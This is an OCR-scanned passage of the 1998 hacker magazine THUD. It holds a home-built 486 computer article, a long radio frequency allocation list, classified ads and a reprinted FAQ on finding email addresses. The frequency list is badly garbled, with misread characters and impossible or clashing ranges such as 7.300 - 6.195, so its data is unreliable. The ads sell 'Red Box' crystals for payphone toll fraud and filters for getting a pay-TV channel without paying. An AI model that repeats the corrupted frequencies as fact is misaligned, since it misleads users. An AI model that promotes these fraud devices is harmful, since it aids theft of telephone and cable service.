drive connector. First, not wanting to risk a HD I just hookedexternal power connector only provides GND, +5, and -5
up a 1.44" floppy. I booted up the system, ran the BIOS setup volts. For drives one needs GND, +5, and +12 volts. The way
and configured the system for the floppy. I then rebooted the in which I obtained these was to remove the power supply
computer and skipped all the menues. Of course, I put in a from the aluminum case and splice into the power leads going
DOS bootable disk into the drive. VOILA!!! the system booted to the motherboard/backplane. Determining which wires were
up just fine. what voltage was easy using a voltmeter. I do not suggest
trying to run more than one small hard drive and one floppy
I then got brave and borrowed one of my older Maxtor drive. I don't think the power supply would be able to proved
LXT-213A drives and hooked it up to the system. This drive, enough current for anything more.
although small, is one of my favorites because it has been so
reliable for me. I no longer use it on my main system as 212 All in all, even though the computer was meant for a specific
megs just isn't enough to run an NT setup. I booted up, ran application, a little ingenuity , imagination, and time will
BIOS setup, configured the system for the drive, and booted provide someone with a nice little computer excellent for data
the system. It worked just fine. aquisition, control processing , or just about anything a small,
self contained 486 can be used for.
Massive Frequency Llst- Bandplan/Aliocations up to 40 MHz .
Gnu Eye Gr in
0.535 - 1.705 AM Broadcast Standard North Amer ica AM 6.000 - 6.000 Time Standard New WARC Allocation Region 3
1.705 - 1.600 Fixed Service LandlMob ile/Marine 6.195 - 6 .615 Maritime Mobile Ship / Shore
1.600 - 2.000 Amateur 160 Meters 6.615 - 9.040 Aeronaut ical Mobile Transoceanic Flights
2.000 - 2.107 Maritime Mobile 9.040 • 9.500 Fixed Service
2.107 - 2.170 Fixed Service Land/Mob ile/Marine 9 .500 - 9.900 Shortwave Broadcast 31 Meters
2.170 - 2.194 Land Mobile Service 9.775 - 9.995 Fixed Service
2.194 - 2.300 Fixed Service 10.000 - 10.000 Time Standard VNN
2.300 - 2.495 Shortwave Broadcast 120 Meters 10.005 - 10.100 Aeronaut ical Mobile Transoceanic Flights
2.495 - 2.505 Time Standard 10.100 - 10.150 Amateur 30 Meters CW Only
2.505 - 2.650 Fixed Service LandlM obile/Marine 10.100 - 11.175 Fixed Service
2.650 - 3.155 Aeronaut ical Mobile Transoceanic Flights 11.175 - 11.400 Aeronau tical Mobile Transoceani c Flights
3.155 - 3.200 Fixed Service 11.400 - 11.650 Fixed Service
3.200 - 3.400 Shortwave Broadcast 90 Meters 11.650 • 12.050 Shortwave Broadcas t 25 Meters
3.400 - 3.500 Aeronaut ical Mobile Transocean ic Flights 12.050 - 12.330 Fixed Service
3.500 - 4.000 Amateu r 60n5 Meters 12.330 - 13.200 Maritime Mobile Ship / Shore
3.900 - 4.000 Shortwave Broadcast 75 Meters , Not in Region 2 13.200 • 13.360 Aeronau tical Mobile Transocean ic Flights
4.000 - 4.000 Time Standa rd New WARC Alloca tion Region 3 13.360 - 13.600 Fixed Service
4.000 - 4.063 Fixed Serv ice 13.600 ·13.800 Shortwave Broadcas t New WARC Allocat ion
4.063 - 4.436 Maritime Mobile Ship / Shore 13.600 - 14.000 Fixed Service
4.436 - 4.650 Fixed Service 14.000 · 14.350 Amateur 20 Meters
4.650 - 4.750 Aeronaut ical Mobile Transocean ic Flights 14.350 - 14.995 Fixed Service
4.750 - 5.060 Shortwave Broadcast 60 Meters 15.000 - 15.000 Time Standard VNN
5.000 - 5.000 Time Standard VNN 15.010 · 15.100 Aeronautical Mobile Transocean ic Flights
5.005 - 5.450 Fixed Service 15.100 - 15.600 Shortwave Broadcast 19 Meters
5.450 - 5.730 Aeronau tical Mobile Transocean ic Flights 15.600 - 16.460 Fixed Service
5.730 - 5.950 Fixed Service 16.460 • 17.360 Maritime Mobile Ship / Shore
5.950 - 6.200 Shortwave Broadcast 49 Meters 17.360 • 17.550 Fixed service
6.200 - 6.525 Maritime Mobile Ship / Shore 17.550 - 17.900 Shortwave Broadcast 16 Meters
6.525 - 6.765 Aeronautical Mobile Transoceanic Flights 17.900 - 18.030 Aeronaut ical Mobile Transoceanic Flights
6.765 - 7.000 Fixed Service 18.030 - 18.760 Fixed Service
7.000 - 7.300 Amateur 40 Meters 16.066 - 16.168 Amateur 17 Meters
7.100 - 7.300 Shortwave Broadcast 41 Meters, Not in Region 2 18.760 - 16.900 Maritime Mobile Ship / Shore
7.300 - 6.195 Fixed Serv ice 16.900 - 19.660 Fixed Service
7.335 - 7.335 Time Standard CHU Canada continued on page 41•••
THUD Volume 1 Issue 2 - Fall 1998 39
I ..""" = H I::! 1_ r:. E::< C I'M!!::! r"!!;i!:;: = = " =M I
Are you looking for those difficult to find parts? Or maybe just a simple novelty item for your entertainment? Or do you have a
product or information you'd like to sell? The Hack Exchange is your buy/sellltrade resource . If you would like to place an ad
in Hack Exchange .... Right now. all classified advertisments are FREE of charge . We must limit each person/company to two
ads not more than 20 lines combined. Stay tuned for advertising rates in the future. To place an ad, send copy to the following
address :
THUD Magazine Advertising
P.O. Box 2521
Cypress, CA 90630
EPROMS COPIED We have an EPROM duplication service. AUCTIONS! You hear about them all the time, but you've
Give us your original and we can make as many copies as never been to one? You gotta GO to one. You can buy just
you'd like. We Specialize in older 2516, 2532. 2716. 2732, about anything for pennies on the dollar! Cars, trucks, boats,
2764, 27128 , 27562 and 27512 EPROMs . We also do houses, electronic equipment, furniture, etc. Forget that "cars
Bi-Polar PROMs, as well. $6 per copy includes the copy for $100" crap. That's a load! But, you can get some pretty
service. the material (any of the part numbers mentioned awesome deals for small amounts of cash.. Our favorite
above) and return shipping. Bi-Polar PROMs may be slightly auctions (and many of the BL411 staff) include the arcade
more or less in cost. 15% discount on 10+ copies. 20% auctions and the car auctions. Remember those arcade
discount on 25+ copies. Send prepaid orders (with master games you played as a kid in the 80's? Man, you can get
copy) or inquiries to: TCE Information Systems. P.O. Box some bitchen deals on those! This is only the tip of the
5142, Los Alamitos, CA 90721 iceberg. There 's SO MANY things you can get for a small
THUD MONTHLY MEETINGS We don't have any meetings fraction of their worth . Send $6 and we'll send you a booklet
for the magazine yet. If you're interested in setting one up in loaded with names, numbers and places to go...You NEED to
YOUR area, please contact us. For now, we suggest you do this! You'll find out how you can attend the non-advertised
hang out at the Blacklisted! 411 meetings until we can come auctions, which will mean better deals for you. Don't miss out
up with our own. THUD Magazine , P.O. Box 2521, Cypress, on all the great deals ! Send $5 right NOW: TCE Information
CA 90630 "Come one, come all, just don't be a FED" Systems, P.O. Box 5142, Los Alamitos, CA 90721.
BLACKLISTED I 411 Magazine From the same people who LOOKING FOR A BLACKLISTED! 411 MEETING IN YOUR
produce THUD is another magazine dedicated to hackers. If AREA? The Official Hackers Magazine is looking for a few
you like this magazine you will like Blacklisted! 411. $5 good men to host meetings in your area! Would you like to
sample copy. Blacklisted! 411 Magazine , P.O. Box 2506, host one? It's easy . Tell us where you want it held and give
Cypress, CA 90630 us a contact name and number or email address. If you want
COIN..QP VIDEO ARCADE GAMES . Repairs, parts, boards, your free subscription , you'll need to provide an address, of
accessories, and empty cabinets available for all your video course. Think about starting a meeting yourself. Blacklisted!
game and pinball needs. Largest selection available in the 411 Magazine, P.O. Box 2506, Cypress, CA 90630
United States. Eldorado Games 911 S. East St. Anaheim. CA 6.500MHz or 6.5536MHz CRYSTALS Your choice. $4 each.
92805 or call (714) 535-3300 FAX (714) 535-3396 No shipping charges . Send to TCE Information Systems ,
WEB SITES We have a list of hundreds of interesting and P.O. Box 5142, Los Alamitos, CA 90721
unusal web sites. Some of the sites are related to this ADVERTISE IN BLACKLISTED! 411 Reach thousands of
magazine and some are not. Hacking, phreaking, breaking readers in the US, Canada, Japan, the UK, Australia, and
the law, sovereign citizenship, lasers, electonics, surplus, elsewhere. Join our long list of satisfied clients who have
credit, etc.. You have to check this out! Save hundreds of made Blacklisted.411 their vehicle for reaching customers.
hours of time by getting our list. We will provide the list on Call 714-899-8853 and request our rate card information .
3-1/2" disk and you can load it directly into your web browser Blacklisted! 411 Magazine, P.O. Box 2506, Cypress, CA
and click on the links OR we can provide the list on paper - 90630
whichever you prefer. Send $5 to TCE Information Systems, ADULT VIDEOS. We have all the newest releases for $25.99
P.O. Box 5142, Los Alamitos , CA 90721 plus s/h or LESS. Get the latest titles, hottest names; Raquel
"TAKE BACK YOUR PRIVACY" Author and Speaker Bill Darian, Mrylin Star, Nikki Dial, Janine, etc. Amateur, all girts,
Hayes shows you how to stay cyber , yet stay private. Real etc. New titles every week. For latest prices, send SASE to:
wortd tips and examples to keep prying eyes and electrons E&M Adult Videos, P.O. Box 1471, Los Alamitos , CA 90720.
out of your life. Send $18.00 (I won't keep any records on you, "I 'VE BEEN BLACKLISTED'" T-shirts now available .
your cash, address, or checking account) plus $2.50 SH to: Endorsed by the Blacklisted ! 411 crew. Get yours now.
Bill Hayes, 12289 Pembroke Road, Suite 151, Hollywood, FL White lettering on black shirt. Available in large and extra
33025 or leave a message at (954) 537-3792. The privacy large sizes. $14.95 each shipped. Send to TCE Information
you preserve will be your own . . . Systems, P.O. Box 5142, Los Alamitos, CA 90721.
"I LOVE TOXIC WASTE" T-SHIRTS Now available.Red on THUD MAGAZINE WANTS YOU! We're still really new, so
white . Available in Large and Extra Large. $16.95 each. TCE we're looking for a few things. If you're a hacker, artist, writer
Information Systems, P.O. Box 5142, Los Alamitos, CA 90721 or auaround freak , send us what ya got! We can offer free
ADVERTISE IN BLACKLISTED! 411 Reach thousands of subscriptions in exchange for articles or artwork we end up
hackers in the US, Canada, Japan , the UK, Australia, and printing. So, get off your butt and send us some good stuff to
elsewhere. Join our long list of satisfied clients who have print in the magazine. THUD Magazine, P.O. Box 2521,
made Blacklisted.411 their vehicle for reaching customers . Cypress, CA 90630.
Blacklisted! 411 Advertising, P.O. Box 2506, Cypress, CA Attention all hackers in Nevadall Join the Nevada
-------
90630 . Call 714-899-8853 and request our rate card Unerground team to expose the local scene. Many hackers
information . like in Nevada but no one knows each other. Find out more at
www.nevadaunderground.org.
WRITE FOR THUP MAGAZINE
Would you like a free subscription?
WRITE SOMETHING FOR US!
40 Volume 1 Issue 2 " Fall 1998 THUD
massive frequency list 26 .975 CB Class 0 Channel 02 30 .070 US Government
continued from page 39 26 .985 CB Class 0 Channel 03 30 .090 USAnmy
19.680 - 19.800 Maritime Mobile Ship / 26 .995 CB Class C 30 .110 USAnmy
Shore 27 .005 CB Class 0 Channel 04 30.130 US Govemment
19.800 · 21.000 Fixed Service 27 .015 CB Class 0 Channel 05 30.150 US Navy
21.000 • 21 .450 Amateur 15 Meters 27 .025 CB Class 0 Channel 06 30 .170 US Government
21.450 • 21 .850 Shortwave Broadcast 27 .035 CB Class 0 Channel 07 30 .190 US Govemment
13 Meters 27.045 CB Class C 30 .210 US Government
21.850 • 22.000 Aeronautical Mobile 27 .055 CB Class 0 Channel 08 30.230 US Government
22.000· 22.720 Maritime Mobile Ship / 27.065 CB Class 0 Channel 09 30 .250 US Government
22.720 • 23 .200 Shore 27 .075 CB Class 0 Channel 10 30 .270 US Government
Fixed Service 27 .085 CB Class 0 Channel 11 30 .290 US Anny/US Navy
23.200 • 23 .350 Aeronautical Mobile 27.095 CB Class C 30 .310 US Government
23.350 • 24.990 Fixed serv ice 27.105 CB Class 0 Channel 12 30 .330 US Coast Guard
24.890 · 24.930 Amateur 12 Meters 27.115 CB Class 0 Channel 13 30 .350 US Govemment
25.000 • 25 .000 Time Standard 27.125 CB Class 0 Channel 14 30 .370 US Government
25.020 Petroleum Products 27.135 CB Class 0 Channel 15 30.390 US Government
25.040 Petroleum Products 27.145 CB Class C 30 .410 US Coast Guard/Navy
25.060 Petroleum Products 27.155 CB Class 0 Channel 16 30 .430 US Government
25.080 Petroleum Products 27.165 CB Class 0 Channel 17 30.450 US Anny/US Navy
25.100 Petroleum Products 27.175 CB Class 0 Channel 18 30.470 US Government
25 .120 Petroleum Products 27.185 CB Class 0 Channel 19 30.490 USAnmy
25.140 Petroleum Products 27.195 CB Class C 30.510 US Air ForcelUS Anmy
25.160 Petroleum Products 27.205 CB Class 0 Channel 20 30.530 US Govemment
25.180 Petroleum Products 27.215 CB Class 0 Channel 21 30.550 US Govemment
25.200 Petroleum Products 27.225 CB Class 0 Channel 22 30 .580 Special Industry
25.220 Petroleum Products 27.235 CB Class 0 Channel 23 30 .600 Special Industry
25.240 Petroleum Products 27.245 CB Class 0 Channel 24 30.620 Special Industry
25.260 Petroleum Products 27.255 CB Class 0 Channel 25 30.640 Special Industry
25.280 Petroleum Products 27.265 CB Class 0 Channel 26 30 .660 Petroleum ProductslMotor Carrier
25.300 Petroleum Products 27.275 CB Class 0 Channel 27 30.680 Forest Products
25.320 Petroleum Products 27.285 CB Class 0 Channel 28 30 .700 Special Industry
25.600 ·26.100 Shortwave Broadcast 27.295 CB Class 0 Channel 29 30 .720 Forest Products
11 Meters 27.305 CB Class 0 Channel 30 30 .740 Petroleum ProductslMotor Carrier
25.870 Broadcast Pickup 27.315 CB Class 0 Channel 31 30 .760 Bus iness
25.910 Broadcast Pickup 27 .325 CB Class 0 Channel 32 30 .780 Spec ial Industry
25.950 Broadcast Pickup 27 .335 CB Class 0 Channel 33 30 .800 Business
25.990 Broadcast Pickup 27.345 CB Class 0 Channel 34 30.820 Petroleum Products/Motor Carrier
26.030 Broadcast Pickup 27 .355 CB Class 0 Channel 35 30.840 Business
26.070 Broadcast Picku p 27.365 CB Class 0 Channe l 36 30 .660 Forestry Conservation/Motor Carrier
26.090 Broadcast Pickup 27 .375 CB Class 0 Channel 37 30 .660 Business
26.110 Broadcas t Pickup 27.365 CB Class 0 Channel 36 30.900 Forestry Conservation/Motor Carrier
26.130 Broadcast Pickup 27.395 CB Class 0 Channel 39 30.920 Business
26.150 Broadcast Pickup 27.405 CB Class 0 Channel 40 30.940 Forestry Conservat ion/Motor Carrier
26.170 Broadcast Pickup 27.430 Business 30 .960 Business
26.190 Broadcast Pickup 27.450 Business 30.980 Fores try Conserva tion/Motor Carrier
26.210 Broadcast Pickup 27 .470 Business 31.000 Business
26.230 Broadcast Pickup 27.490 Business 31.020 Forestry Conservation/Motor Carrier
26.250 Broadcast Pickup 27.510 Business 31.040 Business
26.270 Broadcas t Pickup 27 .530 Business 31.060 Forestry Conservation/Motor Carrier
26.290 Broadcas t Pickup 27 .710 Forest Products 31.060 Motor Carrter- Buses
26.310 Broadcast Pickup 27 .730 Forest Products 31.100 Forestry Conservation/Motor Carrier
26.330 Broadcast Pickup 27 .750 Forest Products 31.120 Motor Carrier· Buses
26.350 Broadcast Pickup 27 .770 Forest Products 31.140 Forestry Conservation/Motor Carrier
26.370 Broadcast Pickup 27 .790 Forest Products 31.160 Business
26.390 Broadcast Pickup 27.900 USAnmy 31.160 Forestry Conservat ion/Motor Carrier
26.410 Broadcast Pickup 26 .000 • 29 .700 Amateur 10 Meters 31.200 Business
26.430 Broadcast Pickup 29 .700 • 29 .600 Forestry Service 31 .220 Forestry Conservation /Motor Carrier
26.450 Broadcast Pickup 29 .600 ·29.890 Fixed Service 31 .240 Business
26.470 Broadcast Pickup 29 .690·29.910 Govemment 31.260 Forestry Conservation/Motor Carrier
26.480 • 26 .950 Govemment 29.910·30.000 Fixed Service 31.260 Motor Carrier - Buses
26.620 Civil Air Patrol 30.010 US Govemment 31.300 Forestry Conservation/Motor Carrier
26.950 • 26 .960 International Fixed Sve 30 .030 US Government 31.320 Motor Carrier· Buses
26.965 CB Class 0 Channel 01 30 .050 US Government continued o n pag e 42..•
6.500 MHz "Red Box" Crystals
BLOWOUT ECS QUARTZ CRYSTALS
Supe r
SMAL L!
PRICES! The crystal used to make the infamous "Red Box" is available now at a
reasonable price. These are very small & perfect for limited space applications.
We've been selling the $4.00 + $1.00 s/h
6.500MHz crystals for
several years now!
Channel 21 "Disney" Filters
r nts IS th.e very notch til.ter ~sed to receive The Disney Channel on Paragon
Systems In Southern California. They try to charge $150 for this sucker!
Order YOURS TODAY ! $20.00 + $2.00 s/h
PVS If you need Zenith Remotes we got em
'
P.O. Box 1032 If you need those hard to find 5 500MHz xtets, we got 'emt
lt CA 90720 If you need channel 2 1 (DIsney) notch titters. we got 'em!
L OS AI am lOS , If you need It. CALL US TODA v!
THUD Volume 1 Issue 2 • Fall 1998 41
massive frequency list continued 33.020 Spec ial EmergencylHighway Maint 34.770 US Government
from page 41 33.040 Spec ial Emergency 34.790 us NaU Park Serv ice
31 .340 Forestry Cons ervation/Motor Carrier 33.060 Spec ial EmergencylHighway Maint 34.810 US Bur of Sport Fisheries & Wildlife
3 1.360 Business 33.080 Specia l Emergency 34.830 US Bur of Sport Fisheries & Wildlife
31 .380 Forestry ConservationIMotor Carrier 33.100 Spec ial EmergencylHighway Maint 34.850 USArrny
3 1'.4 00 Business 33.120 Special Industry 34.870 US Bur of Mines
31 .420 Forestry Conserva tionlMolor Carrier 33 .140 Business 34.890 US Army
31 .440 Business 33.160 Business 34.910 US Army
31 .460 Forestry Conservat ion/Motor Carrier 33 .180 Petroleum Products 34.930 US Government
3 1.480 Motor Carrier - Buses 33 .200 Petroleum Products 34.950 US Navy
3 1.500 Forestry ConservalionIMotor CarTier 33.220 Petroleum Products 34.970 US Government
33.240 Petroleum Products 34.990 US Government
31.520 Motor CarTier - Buses
31.540 Forestry Conservation/Motor Carrier 33.260 Petroleum Products 35.020 Business
31 .560 Business 33 .280 Petroleum Products 35.040 Business
3 1.580 Forestry Conservation/Motor ca rTier 33.300 Petroleum Products 35.060 Business
31 .600 Business 33.320 Petroleum Products 35.080 Business
Forestry Conservation/Motor Carrier 33.340 Petroleum Products 35.100 Business
3 1.620
3 1.640 Business 33.360 Petroleum Products 35.120 Business
31 .660 Forestry ConservationlMotor Carrier 33.380 Petrole um Products 35.140 Business
31 .680 Motor CarTie r· Buses 33.400 Business 0.5W 35.160 Business
31 .700 Forestry Conservation/Motor Carrier 33.420 Fire 35.180 Business
3 1.720 Motor CarTier - Buses 33.440 Fire 35 .200
33.460 Fire 35.220 Mobile Telephone RCC Pag ing
31.740 Forestry ConservationlMotor carTier
3 1.760 Business 33.480 Fire 35 .240
31.780 Forestry ConservationlMotor Carrier 33.500 Fire 35.260 Mobile Telephone Telco Channel ZO
Business 33 .520 Fire 35.280 Spec ial Industry
31.800
Forestry ConservalionlMolor CarTier 33 .540 Fire 35.300 Mobile Telephone Telco Channel ZF
31.820
31.840 Business 33.560 Fire 35 .320 Special Industry
33 .580 Fire 35.340 Mobile Telephone Telco Channel ZH
31 .860 Forestry Conservat ion/Motor Carrier
33 .600 Fire 35.360 Special Industry
3 1.880 Motor CarTier - Buses
3 1.900 Forestry ConservationlMotor Carrier 33 .620 Fire 35.380 Mobile Telephone Telco Channe l ZM
3 1.920 Motor CarTier - Buses 33 .640 Fire 35.400 Specia l Industry
31 .940 Forestry Conservat ion/Motor Carrier 33.660 Fire 35.420 Mobile Telephone Telco Channel ZA
3 1.960 Business 33 .680 Fire 35 .440 Spec ial Industry
31.980 Forestry Conserva tion/Mot or CarTier 33.700 Fire 35 .460 Mobile Telephone Telco Channe l ZV
33.720 Fire 35.480 Spec ial Industry
32.010 US Government
33.740 Fire 35 .500 Mobile Telephone Telco Channel ZR
32.030 US Government
32.050 US ArmylUS Navy 33.760 Fire 35.520 Spec ial Industry
32 .070 US Gove rnment 33.780 Fire 35.540 Mobile Telephone Telco Channe l ZB
US Army 33.800 Fire 35.560
32.090
33.820 Fire 35.580 Mobile Telephone RCC Paging
32.110 US Army
32.130 US Government 33.840 Fire 35.600
33.860 Fire 35.620 Mobile Telephone Telco Channel ZW
32.150 US Governme nt
33.880 Fire 35.640 Spec ial Emergency
32.170 US Govern ment
33.900 Fire 35.660 Mobile Telephone Telco Channel ZL
32.190 US Coast Guard
33.920 Fire 35.680 Special Emergency
32.210 US Government
33.940 Fire 35 .700 Business
32.230 US Government
32 .250 US Dept of Agriculture 33.960 Fire 35 .720 Business
33 .980 Fire 35.740 Special Industry
32.270 US Dept of Agric ulture
34.010 US Coast Guard 35.760 Spec ial Industry
32.290 US Army
34.030 US Dept of Energy 35.780 Spec ial Industry
32.310 US ArmylUS Dept of Agr
32 .330 US Air Force 34.050 US Gove rnment 35.800 Special Industry
34.070 US Government 35.820 Special Industry
32.350 US Air ForcelUS Bur of Reclamation
32.370 US Air ForcelUS Dept of Agr 34.090 US Army 35.840 Spec ial Industry
34.110 US Army 35 .860 Special Industry
32 .390 US Dept of Agriculture
32.410 34.130 US Government 35.880 Business
US Army
34 .150 US Air ForcelUS Army/US Navy 35 .900 Business
32.430 US Air Force
34 .170 US Dept of AgricUlture 35 .920 Business
32.450 US Air ForcelUS Navy
34.190 US Army/US ArmylUS Dept of Agr 35.940 Business
32.470 US Dept of AgriculturelUS Bur of
34.210 US Air ForcelUS Dept of Agr 35.960 Business
Reclamation
34 .230 US Dept of AgricUlture 35.980 Business
32.490 US Army
34 .250 US Dept of Agriculture 36.010 US Dept of The Interior
32 .510 US Army
34 .270 US Dept of Agricultu re 36.030 US Dept of The Interior
32 .530 US ArmylUS Dept of Agr
34 .290 US Army 36.050 US Dept of Energy
32 .550 US Dept of Agricu lture
34 .310 US Army 36.070 US Government
32 .570 US Dept of Agriculture
US Dept of Agriculture 34.330 US Army 36.090 US Army
32.590
US Dept of Agriculture 34 .350 US Air ForcelUS Navy 36.110 US Army
32.610
US Dept of Agriculture 34.370 US Government 36.130 US Government
32 .630
US Air Force/US Navy 34.390 US Dept of Agriculture 36.150 US Navy/US Dept of Trans
32 .650
34.410 US Government 36.170 US Dept of The Interior
32 .670 US Government
34.430 US Dept of Agric ulture 36.190 US Ocean Survey
32 .690 US Army
34 .450 US Dept of Agriculture 36.210 US Gove rnme nt
32 .710 US Army
34.470 US Dept of Agriculture 36.230 US Dept of The Interior
32 .730 US NaU Park Service
34.490 US Army 36.250 Petroleum Products
32 .750 US Dept of AgricUlture
32 .770 US Dept of Agriculture 34 .510 US Army 36.270 US Government
US Dept of Agriculture 34 .530 US Navy 36.290 US Army
32 .790
US Dept of Agriculture 34 .550 US Air ForcelUS ArmylUS Navy 36.310 US Army
32 .810
US Dept of Agriculture 34 .570 US Dept of Agriculture 36.330 US Dept of Energy
32 .830
US Air Force 34 .590 US Air ForcelUS Dept of Agr 36.350 US Dept of Health & Hum SvcslNavy
32 .850
34 .610 US Air ForcetUS Dept of Agr 36.370 US ForstSvc
32 .870 US Government
US Army 34.630 US Dept of Agriculture 36.390 US Dept of Energy
32 .890
US ArmylUS Navy 34.650 US Dept of Agriculture 36 .410 US Forst SvclUS Dept of Agr
32 .910
US Government 34.670 US Dept of Agriculture 36.430 US Dept of Agriculture
32.930
34.690 US Army 36 .450 US Dept of Agriculture
32 .950 US Air Force
34.710 US Army 36.470 US Dept of Agriculture
32 .970 US Government
34.730 US Navy 36.490 US Army
32 .990 US Government
34.750 US Air Force continued on page 49.••
The hackers UndergrOUnd digest wants you!
Send Articles to: THUD, P. O. Box 2521, Cypress, CA 90630
42 .Volume 1 Issue 2 - Fall 1998 THUD
FAG: J-Iow to Find peoples Email addresses
edited b y Cherie Chan
Maintainer : David Alex Lamb In summary, if you want to advertise someone's E-mail
(dalamb@qucis.queensu.ca) address, get his/her permission before you do it. Besides, if
Version: $Id: finding.n,v 2.241998/06/11 13:28:38 dalamb you're going to advertise an address, it's a good idea to make
Exp dalamb $ sure it works first, and writing to it for permission is a good
Copyright c 1991,1992,1993,1994 Jonathan I. Kamens way to do that.
Copyright c 1994,1995,1996,1997,1998 David Alex Lamb.
Web Searches
The master copy of this page is at Queen's University @
http://www.qucls.queensu.ca/FAQs/emaillfinding.html. E-mail and phone directories
See end of file for copying permissions. An older version of Entry Changed: Sat Dec 21 1996 .
this FAQ is available in French Several organizations let you search for addresses by filling in
and submitting a form from your Web browser. In many cases
Introduction these services populated their databases by scanning for
addresses in USENET news postings.
A question which appears frequently on the Usenet is, "I know
someone's name, and I think they might have an electronic MESA (MetaEmailSearchAgent) @ http://mesa.rrzn.uni-
mail address somewhere. How can I find it?" hannover.de/ allows you to submit a single query to multiple
search engines, including Bigfoot. DejaNews, Four11, IAF,
There are many different techniques for doing this. Several of Infospace, Swissinfo, and suchen.de. You get to specify how
them are discussed below. Your best bet is to try the pertinent long to wait, and it might time out retuming no hits.
methods in this posting in the order in which they are listed
(well, sort of; at the very least, please try all the pertinent 555-1212.com @ http://www.555-1212.com/ is an on-line
methods which do not involve posting queries to soc.net- directory of telephone numbers, compiled from the three
people before resorting to that). major telephone information vendors. Unlike many other
search engines, it has few graphics to slow you down. It
I've listed "Direct contact" near the end of this list because, for provides several other directory services as well.
some reason, people seem to be reluctant to call people on
the telephone or write them a paper-mail letter asking what Four11 @http://www.four11 .com/is a commercial online
their E-mail address is, as long as there is even a remote directory service with over 10 million listings (as of August
chance that it might be found without asking. This attitude is 1997) All Internet users are provided free basic access, which
somewhat counterproductive, since in most cases, it is much includes a free listing and free searching. You can also
easier to get someone's E-mail address by asking them than access the service by sending mail to info@four11.com.
it is by follow ing the other methods outlined below.
Furthermore, even if you do manage to find an E-mail address Yahoo People Search @ http://www.yahoo.com/search/
using one of the on-line methods described below, it is not people/ which currently uses Four11.
guaranteed that the person at the other end of the line checks
that address regularly or even that it is the correct address. InfoSpace @ http://www.infospace.com has about 200
million worldwide telephone numbers, and also provides
Therefore, if you do have a telephone number that isn't too search for e-mail addresses.
expensive to call, or if you have a paper-mail address and
aren't in too much of a hurry, you can probably save yourself WhoWhere? @ http://www.whowhere.com has directories
a lot of trouble by skipping all of the on-line methods listed for e-mail, phone numbers, and personal Web pages. You
below and going directly to "Direct contact." can search based on affiliations like occupation, school, or
interests.
Avoid public distribution of individuals' addresses
POPULUS @ http://www.populus.net asks people register
It is considered rude to widely distribute (e.g., in a Usenet with them, providing personal information such as interests,
posting) a person's E-mail address without his/her prior college attended, and date of birth, then lets people search on
consent, even if the address is publicly available using one of this information.
the techniques described below or some other technique.
Internet Address Finder @ http://www.iaf.netlhas about
It might seem that having one's E-mail address listed in a 4.5 million listings as of July 1996.
publicly accessible database is equivalent to distributing it, but
this is not the case in practice, for three primary reasons: Find mE-Mall @ http://www .flndmemail.com/advertises
itself as the place to post your new e-mail address, for your
>Some people may not be aware that their addresses are old e-mail friends.
available for others to locate. For example, the majority of
Usenet posters are unaware of the database of Usenet E-mail Switchboard @ http://www.swltchboard.com/is a Web-
addresses mentioned below. based telephone directory; its names are compiled from
published white pages directories and other publicly-available
>When some effort is required to locate a person's address sources. If you register a password with Switchboard, you can
(e.g., using the techniques described below), only people who add additional information to your listing, including your email
have a specific reason to send mail to him/her will go to the address. You can arrange to hide your email address (or
trouble. However, if the address is mentioned in a Usenet other parts of your listing), while still allowing people to email
posting read by thousands of people, no effort is required to you a brief note via Switchboard. _
obtain it, and many more people will send him/her mail. Most
people with E-mail addresses are not accustomed to AnyWho @ http://www.anywho.com/is a white pages and
receiving E-mail from strangers or large amounts of E-mail, yellow pages directory service that encourages people to
and they may not be happy if they do. update their listing to include e-mail addresses.
>As unwanted E-mail becomes more common, people will Phonebooke @ http://www.phonebooke.com/lets you
start to remove their addresses from public databases, which search for people in the USA by name or phone number, and
means that it will become more difficult to find people's provides forms to interface with many other search engines,
addresses for legitimate reasons. including Four11, the AT&T Internet directory, NYNEX' Big
Yellow, and 555-1212.com.
THUD Volume 1 Issue 2 - Fall 1998 43
Bigfoot @ http ://www .bigfoot.com/has about 100 million The College Email FAQ @ http://www.qucis.queensu.cal
white pages listings and 8 million e-mail listings as of FAQslemail/college.html describes the account and E-mail
December 1996. The company focuses on value-added address policies for graduate and undergraduate students at
services for e-mail users, complementing those of ISPs. many universities and colleges. If you are looking for a
university/college student , check those postings for the
Altavista university or college in question and follow their instructions
http://www.altavista.digital.com for finding out more.
Entry Created: Fri Jul 5 1996
This FAQ is also posted regularly to soc.college as a
Digital's Altavista search engine indexes Web pages and colI~tion of postings whose subjects start with "College
Usenet postings. If you suspect the person you are looking for Email Addresses." If the postings have expired at your site or
has created a web page or posted to Usenet, you may be able has not been posted recently, you can get a copy of them
to find them this way. using the instructions below.
National white pages If the university has a PH (phonebook) server, it may be listed
Entry Changed: Thu Dec 121996 in the Colleges and Universities PH server directory @
http://home.cdsnet.netl-zachbolothers.html.
There are a few internet white pages based on nationality:
ClassMates @ http://www.classmates.com lets secondary
Australia http://www.whitepages.com.aul school alumni freely register their e-mail addresses; the
Belgium http://www.advalvas.beIwhite database covers US, Canada, and American Overseas high
Brazil http://www.supermail.com.br/ schools.
Finland http://www.kotka.fi1
France et La Francophonie http://www.pagesweb.com Usenet-addresses server
Germany (German Telecom) http://www.email-service.de/
Germany http://www.suchen.de/ If you think that your target may be on the Usenet and may
Germany http://www.finden.de/ have posted a message to the Usenet at some point in the
Hungary http://www.skyex.com/default1.htm past, you might be able to find hislher address in the Usenet
Israel http://www.ibm.nel.illWebPh address database on the machine rtfm.mit.edu.
Italy http://www.ats.itlwpagesl
Sweden http://directory.ausys.se/ecatalog/search.htm To query the database, send an E-mail message to mail-
Switzerland http://www.swissinfo.ch/emaill server@rtfm.mit.edu with "send usenet-addresseslname" in
the body of the message. The "name" should be one or more
space-separated words for which you want to search; since
lookup.com the search is fuzzy (i.e., all of the words you specify do not
http://www.lookup.com/ have to match), you should list all of the words you think might
Entry Changed: Fri Jul 5 1996 appear in the address, including (for example) first and last
name, possible username, and possible components of the
LookUP! merged with Four11 in the spring of 1996. host name (e.g. "mit" for a person who you think is at MIT).
The case and order of the words you list are ignored.
Gopher and PH
Note that multiple requests can appear (on separate lines) in
Gopher is an Internet-wide distributed document retrieval mail to the mail server, but each request will be answered in a
service. If your site has a gopher dient program, you can use separate message.
it to access gopher servers at other sites; domain X.edu might
have a gopher server gopher.X.edu, but there's no guarantee. In many cases, you will get a list of quite a few matching
One kind of document sites often place under gopher is their addresses, and you will have to go through it looking for ones
phonebook ; many phonebooks are managed through a that may be the one you're looking for. However, the mail
system called PH @ http://www.amherst.edu/-atstarr/ server will return a maximum of only 40 matches.
computers/ph.html.
